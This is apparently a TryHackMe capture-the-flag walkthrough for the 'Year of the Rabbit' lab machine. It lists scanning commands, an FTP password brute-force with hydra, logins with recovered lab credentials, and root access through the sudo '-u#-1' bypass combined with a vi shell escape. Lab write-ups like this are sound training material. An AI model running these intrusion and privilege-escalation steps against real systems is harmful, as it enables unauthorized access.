Year of the Rabbit

Room Link: https://tryhackme.com/room/yearoftherabbit

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Turn off Javascript

Enter about:config into the search bar and select Accept the Risk and Continue.
Enter javascript.enabled into the search box at the top of the page.
Select the javascript.enabled toggle to change the value to false.

Kali

strings Hot_Babe.png 

Kali

hydra -l ftpuser -P passwords.txt ftp://$VICTIM

FTP

Kali

ftp $VICTIM
password: 5iez1wGXKfPKQ

Elis creds is encoded with something called Brain fuck. There are tools online to decode it.

Link: https://www.dcode.fr/brainfuck-language

Kali

ssh eli@$VICTIM
Password: DSpDiM1wAEwid

Victim

locate s3cr3t
cat cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! 

Victim

su gwendoline
Password: MniVCQVhQHUNI

Privilege escalation

Mostly followed the link below, we can't run sudo with root as we have (ALL , !root) here. if we had (ALL , ALL) it would be easy to escalate. Adding sudo -u#-1 to infront of the command allows us to bypass this.

Link: https://www.exploit-db.com/exploits/47502

Victim

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
#While vi is open run:
:!/bin/sh